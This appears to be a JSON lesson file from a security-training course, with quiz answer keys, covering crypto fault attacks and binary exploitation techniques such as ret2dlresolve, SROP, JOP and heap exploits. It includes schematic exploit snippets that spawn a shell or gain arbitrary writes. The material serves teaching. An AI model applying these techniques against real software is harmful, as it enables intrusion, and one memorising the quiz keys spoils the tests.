exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"Base64 is...","opts":["Encryption","Encoding (easily reversed)","Hashing","Compression"],"ans":1},{"type":"quiz","q":"CA signs...","opts":["Websites","Digital certificates","Emails","Malware"],"ans":1},{"type":"quiz","q":"Timing attack exploits...","opts":["Weak keys","Execution time differences","Latency","CPU bugs"],"ans":1},{"type":"quiz","q":"Salt prevents...","opts":["Brute force","Rainbow table attacks","All attacks","Dictionary"],"ans":1},{"type":"quiz","q":"TLS replaced...","opts":["SSH","SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"Symmetric uses...","opts":["Two keys","One shared key","No key","A hash"],"ans":1},{"type":"quiz","q":"RSA is...","opts":["Symmetric","Asymmetric","Hashing","Encoding"],"ans":1},{"type":"quiz","q":"Nonce is...","opts":["Password","Number used once","Cipher","Protocol"],"ans":1},{"type":"quiz","q":"PBKDF2 is a...","opts":["Cipher","Key derivation function","Hash","Protocol"],"ans":1},{"type":"quiz","q":"Forward secrecy means...","opts":["Future safe","Past sessions safe if key leaks","Same keys","No encryption"],"ans":1},{"type":"quiz","q":"MAC in crypto is...","opts":["Media Access Control","Message Authentication Code","Machine Certificate","Master Channel"],"ans":1},{"type":"quiz","q":"ChaCha20 is a...","opts":["Hash","Stream cipher","Block cipher","Key exchange"],"ans":1},{"type":"quiz","q":"Argon2 is used for...","opts":["Encryption","Password hashing (memory-hard)","Signing","Key exchange"],"ans":1},{"type":"quiz","q":"Key reuse in stream ciphers allows...","opts":["Faster decrypt","XORing ciphertexts to recover plaintext","Key recovery","Nothing"],"ans":1}]},{"id":"cr-fault-injection","cat":"Cryptography","title":"Fault Injection Attacks","diff":5,"xp":300,"intro":"Induce hardware faults during crypto operations to leak key bits.","sections":[{"type":"text","content":"Voltage glitching, clock glitching, or laser fault injection during AES/RSA computation causes incorrect outputs. Comparing correct vs faulted outputs reveals key bits (Differential Fault Analysis)."},{"type":"code","lang":"bash","content":"# Fault injection targets:\n# AES: fault in round 8 or 9 -> DFA recovers the key\n# RSA-CRT: one faulted signature + one correct -> factor N\n# p = GCD(S_fault^e - M, N)\n# Tools: ChipWhisperer (open-source glitching platform)"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"RSA-CRT fault attack recovers the prime by...","opts":["Brute force","Computing GCD of the faulted signature and N","Timing analysis","Frequency analysis"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"Base64 is...","opts":["Encryption","Encoding (easily reversed)","Hashing","Compression"],"ans":1},{"type":"quiz","q":"CA signs...","opts":["Websites","Digital certificates","Emails","Malware"],"ans":1},{"type":"quiz","q":"Timing attack exploits...","opts":["Weak keys","Execution time differences","Latency","CPU bugs"],"ans":1},{"type":"quiz","q":"Salt prevents...","opts":["Brute force","Rainbow table attacks","All attacks","Dictionary"],"ans":1},{"type":"quiz","q":"TLS replaced...","opts":["SSH","SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"Symmetric uses...","opts":["Two keys","One shared key","No key","A hash"],"ans":1},{"type":"quiz","q":"RSA is...","opts":["Symmetric","Asymmetric","Hashing","Encoding"],"ans":1},{"type":"quiz","q":"Nonce is...","opts":["Password","Number used once","Cipher","Protocol"],"ans":1},{"type":"quiz","q":"PBKDF2 is a...","opts":["Cipher","Key derivation function","Hash","Protocol"],"ans":1},{"type":"quiz","q":"Forward secrecy means...","opts":["Future safe","Past sessions safe if key leaks","Same keys","No encryption"],"ans":1},{"type":"quiz","q":"MAC in crypto is...","opts":["Media Access Control","Message Authentication Code","Machine Certificate","Master Channel"],"ans":1},{"type":"quiz","q":"ChaCha20 is a...","opts":["Hash","Stream cipher","Block cipher","Key exchange"],"ans":1},{"type":"quiz","q":"Argon2 is used for...","opts":["Encryption","Password hashing (memory-hard)","Signing","Key exchange"],"ans":1},{"type":"quiz","q":"Key reuse in stream ciphers allows...","opts":["Faster decrypt","XORing ciphertexts to recover plaintext","Key recovery","Nothing"],"ans":1}]},{"id":"cr-homomorphic-ops","cat":"Cryptography","title":"Homomorphic Encryption Operations","diff":5,"xp":300,"intro":"Perform addition and multiplication on encrypted data without decryption.","sections":[{"type":"text","content":"FHE schemes (BFV, CKKS, TFHE): CKKS for approximate arithmetic (ML inference), BFV for exact integers (voting), TFHE for Boolean circuits. Noise grows with operations \u2014 bootstrapping resets it."},{"type":"code","lang":"bash","content":"# CKKS (approximate): good for ML\n# Enc(3.14) + Enc(2.72) = Enc(5.86)\n# BFV (exact integer): good for counting\n# Enc(5) * Enc(3) = Enc(15)\n# TFHE (Boolean): good for arbitrary computation\n# Libraries: Microsoft SEAL, OpenFHE, concrete (Zama)"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"Bootstrapping in FHE is needed to...","opts":["Encrypt data","Reset accumulated noise so more operations can proceed","Generate keys","Compress ciphertexts"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"Base64 is...","opts":["Encryption","Encoding (easily reversed)","Hashing","Compression"],"ans":1},{"type":"quiz","q":"CA signs...","opts":["Websites","Digital certificates","Emails","Malware"],"ans":1},{"type":"quiz","q":"Timing attack exploits...","opts":["Weak keys","Execution time differences","Latency","CPU bugs"],"ans":1},{"type":"quiz","q":"Salt prevents...","opts":["Brute force","Rainbow table attacks","All attacks","Dictionary"],"ans":1},{"type":"quiz","q":"TLS replaced...","opts":["SSH","SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"Symmetric uses...","opts":["Two keys","One shared key","No key","A hash"],"ans":1},{"type":"quiz","q":"RSA is...","opts":["Symmetric","Asymmetric","Hashing","Encoding"],"ans":1},{"type":"quiz","q":"Nonce is...","opts":["Password","Number used once","Cipher","Protocol"],"ans":1},{"type":"quiz","q":"PBKDF2 is a...","opts":["Cipher","Key derivation function","Hash","Protocol"],"ans":1},{"type":"quiz","q":"Forward secrecy means...","opts":["Future safe","Past sessions safe if key leaks","Same keys","No encryption"],"ans":1},{"type":"quiz","q":"MAC in crypto is...","opts":["Media Access Control","Message Authentication Code","Machine Certificate","Master Channel"],"ans":1},{"type":"quiz","q":"ChaCha20 is a...","opts":["Hash","Stream cipher","Block cipher","Key exchange"],"ans":1},{"type":"quiz","q":"Argon2 is used for...","opts":["Encryption","Password hashing (memory-hard)","Signing","Key exchange"],"ans":1},{"type":"quiz","q":"Key reuse in stream ciphers allows...","opts":["Faster decrypt","XORing ciphertexts to recover plaintext","Key recovery","Nothing"],"ans":1}]},{"id":"ex-ret2dlresolve","cat":"Exploitation","title":"ret2dlresolve Attack","diff":5,"xp":300,"intro":"Forge dynamic linker structures to resolve and call any libc function.","sections":[{"type":"text","content":"When you can't leak libc, fake the dynamic resolver's data structures (ELF relocation entries) so _dl_runtime_resolve calls system() for you. No ASLR leak needed."},{"type":"code","lang":"bash","content":"# ret2dlresolve: forge .rel.plt, .dynsym, .dynstr entries\n# The dynamic linker resolves the fake entry to system()\n# pwntools automates this:\nfrom pwn import *\ndlresolve = Ret2dlresolvePayload(elf, symbol='system', args=['/bin/sh'])\nrop.ret2dlresolve(dlresolve)"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"ret2dlresolve avoids ASLR leaks by...","opts":["Disabling ASLR","Forging linker structures so the dynamic resolver calls your target function","Using static linking","Brute forcing addresses"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1},{"type":"quiz","q":"Fuzzing sends...","opts":["Valid input","Random/mutated input to find crashes","Network packets","Encryption keys"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection","Position Independent Executable","Protocol Interface","Packet Inspection"],"ans":1},{"type":"quiz","q":"ROP gadget ends with...","opts":["jmp","call","nop","ret"],"ans":3},{"type":"quiz","q":"pwntools is for...","opts":["Web scraping","Binary exploitation","Machine learning","Database"],"ans":1},{"type":"quiz","q":"GDB is for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"CVE stands for...","opts":["Common Vulnerabilities and Exposures","Critical Vulnerability Engine","Certified Expert","Centralized Evaluator"],"ans":0},{"type":"quiz","q":"Web shell provides...","opts":["DDoS","Persistent command execution via HTTP","Email access","DNS control"],"ans":1},{"type":"quiz","q":"Bind shell listens on...","opts":["Attacker's machine","Target machine","Relay server","Random port"],"ans":1},{"type":"quiz","q":"msfvenom generates...","opts":["Wordlists","Metasploit payloads","Network maps","Encryption keys"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Code execution on stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"Shellcode must be...","opts":["Compiled","Position-independent","Encrypted","Signed"],"ans":1},{"type":"quiz","q":"Format string %n does...","opts":["Prints number","Writes to memory","Prints newline","Prints nothing"],"ans":1},{"type":"quiz","q":"Heap overflow corrupts...","opts":["Stack","Malloc chunk metadata","Page tables","TLS"],"ans":1},{"type":"quiz","q":"Use-after-free exploits...","opts":["Stack frames","Freed memory reallocated with attacker data","Network","Files"],"ans":1}]},{"id":"ex-sigreturn","cat":"Exploitation","title":"SROP (Sigreturn Oriented Programming)","diff":5,"xp":300,"intro":"Abuse the sigreturn syscall to set all registers at once.","sections":[{"type":"text","content":"sigreturn restores all registers from a signal frame on the stack. Forge a fake signal frame to set RIP, RSP, and all other registers in one syscall \u2014 more powerful than ROP."},{"type":"code","lang":"bash","content":"from pwn import *\nframe = SigreturnFrame()\nframe.rax = constants.SYS_execve\nframe.rdi = binsh_addr\nframe.rsi = 0\nframe.rdx = 0\nframe.rip = syscall_ret\npayload = b'A'*offset + p64(sigreturn_gadget) + bytes(frame)"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"SROP is more powerful than ROP because...","opts":["It's faster","One sigreturn call sets ALL registers simultaneously","It uses fewer gadgets","It bypasses NX"],"ans":1},{"type":"quiz","q":"Integer overflow causes...","opts":["Division by zero","Value exceeding type's max wraps around","Null pointer","Memory leak"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1},{"type":"quiz","q":"Fuzzing sends...","opts":["Valid input","Random/mutated input to find crashes","Network packets","Encryption keys"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection","Position Independent Executable","Protocol Interface","Packet Inspection"],"ans":1},{"type":"quiz","q":"ROP gadget ends with...","opts":["jmp","call","nop","ret"],"ans":3},{"type":"quiz","q":"pwntools is for...","opts":["Web scraping","Binary exploitation","Machine learning","Database"],"ans":1},{"type":"quiz","q":"GDB is for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"CVE stands for...","opts":["Common Vulnerabilities and Exposures","Critical Vulnerability Engine","Certified Expert","Centralized Evaluator"],"ans":0},{"type":"quiz","q":"Web shell provides...","opts":["DDoS","Persistent command execution via HTTP","Email access","DNS control"],"ans":1},{"type":"quiz","q":"Bind shell listens on...","opts":["Attacker's machine","Target machine","Relay server","Random port"],"ans":1},{"type":"quiz","q":"msfvenom generates...","opts":["Wordlists","Metasploit payloads","Network maps","Encryption keys"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Code execution on stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"Shellcode must be...","opts":["Compiled","Position-independent","Encrypted","Signed"],"ans":1},{"type":"quiz","q":"Format string %n does...","opts":["Prints number","Writes to memory","Prints newline","Prints nothing"],"ans":1},{"type":"quiz","q":"Heap overflow corrupts...","opts":["Stack","Malloc chunk metadata","Page tables","TLS"],"ans":1}]},{"id":"ex-jop","cat":"Exploitation","title":"JOP (Jump Oriented Programming)","diff":4,"xp":250,"intro":"Like ROP but uses JMP instead of RET \u2014 bypasses ROP mitigations.","sections":[{"type":"text","content":"JOP chains gadgets ending in JMP (not RET). A dispatch gadget manages control flow. Bypasses return-address-based mitigations like shadow stacks."},{"type":"code","lang":"bash","content":"# JOP dispatch table:\n# JMP [rax]  -> gadget 1 (sets rax to next entry)\n# JMP [rax]  -> gadget 2\n# Each gadget does work + updates the dispatch register\n# No RET instructions used \u2014 bypasses shadow stack"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"JOP bypasses shadow stacks because...","opts":["It's faster","It uses JMP instead of RET (shadow stacks only protect return addresses)","It encrypts payloads","It uses NOP sleds"],"ans":1},{"type":"quiz","q":"Use-after-free exploits...","opts":["Stack frames","Freed memory reallocated with attacker data","Network","Files"],"ans":1},{"type":"quiz","q":"Integer overflow causes...","opts":["Division by zero","Value exceeding type's max wraps around","Null pointer","Memory leak"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1},{"type":"quiz","q":"Fuzzing sends...","opts":["Valid input","Random/mutated input to find crashes","Network packets","Encryption keys"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection","Position Independent Executable","Protocol Interface","Packet Inspection"],"ans":1},{"type":"quiz","q":"ROP gadget ends with...","opts":["jmp","call","nop","ret"],"ans":3},{"type":"quiz","q":"pwntools is for...","opts":["Web scraping","Binary exploitation","Machine learning","Database"],"ans":1},{"type":"quiz","q":"GDB is for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"CVE stands for...","opts":["Common Vulnerabilities and Exposures","Critical Vulnerability Engine","Certified Expert","Centralized Evaluator"],"ans":0},{"type":"quiz","q":"Web shell provides...","opts":["DDoS","Persistent command execution via HTTP","Email access","DNS control"],"ans":1},{"type":"quiz","q":"Bind shell listens on...","opts":["Attacker's machine","Target machine","Relay server","Random port"],"ans":1},{"type":"quiz","q":"msfvenom generates...","opts":["Wordlists","Metasploit payloads","Network maps","Encryption keys"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Code execution on stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"Shellcode must be...","opts":["Compiled","Position-independent","Encrypted","Signed"],"ans":1},{"type":"quiz","q":"Format string %n does...","opts":["Prints number","Writes to memory","Prints newline","Prints nothing"],"ans":1}]},{"id":"ex-house-of-force","cat":"Exploitation","title":"House of Force (Heap Exploit)","diff":5,"xp":300,"intro":"Overwrite the top chunk size to control malloc's next allocation address.","sections":[{"type":"text","content":"Overwrite the wilderness (top chunk) size to a huge value. The next malloc request of a calculated size returns an arbitrary address \u2014 write-what-where."},{"type":"code","lang":"c","content":"// House of Force:\n// 1. Overflow into top chunk, set size to 0xFFFFFFFF\n// 2. Calculate distance to target:\n//    evil_size = target_addr - top_chunk_addr - 2*SIZE_SZ\n// 3. malloc(evil_size) -> moves top chunk to target\n// 4. Next malloc returns target address\n// 5. Write controlled data at target"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"House of Force works by...","opts":["Stack smashing","Overwriting the top chunk size so malloc returns an arbitrary address","Format string","Integer overflow"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1},{"type":"quiz","q":"Fuzzing sends...","opts":["Valid input","Random/mutated input to find crashes","Network packets","Encryption keys"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection","Position Independent Executable","Protocol Interface","Packet Inspection"],"ans":1},{"type":"quiz","q":"ROP gadget ends with...","opts":["jmp","call","nop","ret"],"ans":3},{"type":"quiz","q":"pwntools is for...","opts":["Web scraping","Binary exploitation","Machine learning","Database"],"ans":1},{"type":"quiz","q":"GDB is for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"CVE stands for...","opts":["Common Vulnerabilities and Exposures","Critical Vulnerability Engine","Certified Expert","Centralized Evaluator"],"ans":0},{"type":"quiz","q":"Web shell provides...","opts":["DDoS","Persistent command execution via HTTP","Email access","DNS control"],"ans":1},{"type":"quiz","q":"Bind shell listens on...","opts":["Attacker's machine","Target machine","Relay server","Random port"],"ans":1},{"type":"quiz","q":"msfvenom generates...","opts":["Wordlists","Metasploit payloads","Network maps","Encryption keys"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Code execution on stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"Shellcode must be...","opts":["Compiled","Position-independent","Encrypted","Signed"],"ans":1},{"type":"quiz","q":"Format string %n does...","opts":["Prints number","Writes to memory","Prints newline","Prints nothing"],"ans":1},{"type":"quiz","q":"Heap overflow corrupts...","opts":["Stack","Malloc chunk metadata","Page tables","TLS"],"ans":1},{"type":"quiz","q":"Use-after-free exploits...","opts":["Stack frames","Freed memory reallocated with attacker data","Network","Files"],"ans":1}]},{"id":"ex-fastbin-dup","cat":"Exploitation","title":"Fastbin Dup (Double Free)","diff":4,"xp":250,"intro":"Free a chunk twice to get malloc to return the same address twice.","sections":[{"type":"text","content":"Double-free a fastbin chunk (free(A), free(B), free(A)). malloc returns A, which you fill with a fake fd pointer. Next malloc follows the fake pointer \u2014 arbitrary allocation."},{"type":"code","lang":"c","content":"// Fastbin dup:\nfree(A);  // fastbin: A\nfree(B);  // fastbin: B -> A\nfree(A);  // fastbin: A -> B -> A (circular!)\nmalloc(); // returns A, write fake fd = target\nmalloc(); // returns B\nmalloc(); // returns A (your fake fd)\nmalloc(); // returns target! Write-what-where"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"Fastbin dup requires...","opts":["A buffer overflow","Double-freeing a chunk to create a circular list","A format string","A race condition"],"ans":1},{"type":"quiz","q":"Integer overflow causes...","opts":["Division by zero","Value exceeding type's max wraps around","Null pointer","Memory leak"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1},{"type":"quiz","q":"Fuzzing sends...","opts":["Valid input","Random/mutated input to find crashes","Network packets","Encryption keys"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection","Position Independent Executable","Protocol Interface","Packet Inspection"],"ans":1},{"type":"quiz","q":"ROP gadget ends with...","opts":["jmp","call","nop","ret"],"ans":3},{"type":"quiz","q":"pwntools is for...","opts":["Web scraping","Binary exploitation","Machine learning","Database"],"ans":1},{"type":"quiz","q":"GDB is for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"CVE stands for...","opts":["Common Vulnerabilities and Exposures","Critical Vulnerability Engine","Certified Expert","Centralized Evaluator"],"ans":0},{"type":"quiz","q":"Web shell provides...","opts":["DDoS","Persistent command execution via HTTP","Email access","DNS control"],"ans":1},{"type":"quiz","q":"Bind shell listens on...","opts":["Attacker's machine","Target machine","Relay server","Random port"],"ans":1},{"type":"quiz","q":"msfvenom generates...","opts":["Wordlists","Metasploit payloads","Network maps","Encryption keys"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Code execution on stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"Shellcode must be...","opts":["Compiled","Position-independent","Encrypted","Signed"],"ans":1},{"type":"quiz","q":"Format string %n does...","opts":["Prints number","Writes to memory","Prints newline","Prints nothing"],"ans":1},{"type":"quiz","q":"Heap overflow corrupts...","opts":["Stack","Malloc chunk metadata","Page tables","TLS"],"ans":1}]},{"id":"ex-tcache-poison","cat":"Exploitation","title":"Tcache Poisoning","diff":4,"xp":250,"intro":"Corrupt the tcache free list for arbitrary memory allocation.","sections":[{"type":"text","content":"Tcache has no integrity checks (glibc < 2.32). Free a chunk, overwrite its fd pointer, and the next allocation of that size returns your chosen address."},{"type":"code","lang":"c","content":"// Tcache poisoning (glibc < 2.32):\nfree(chunk);  // chunk goes to tcache\n// Overwrite chunk's fd pointer (e.g., via UAF or overflow)\n*(size_t*)chunk = 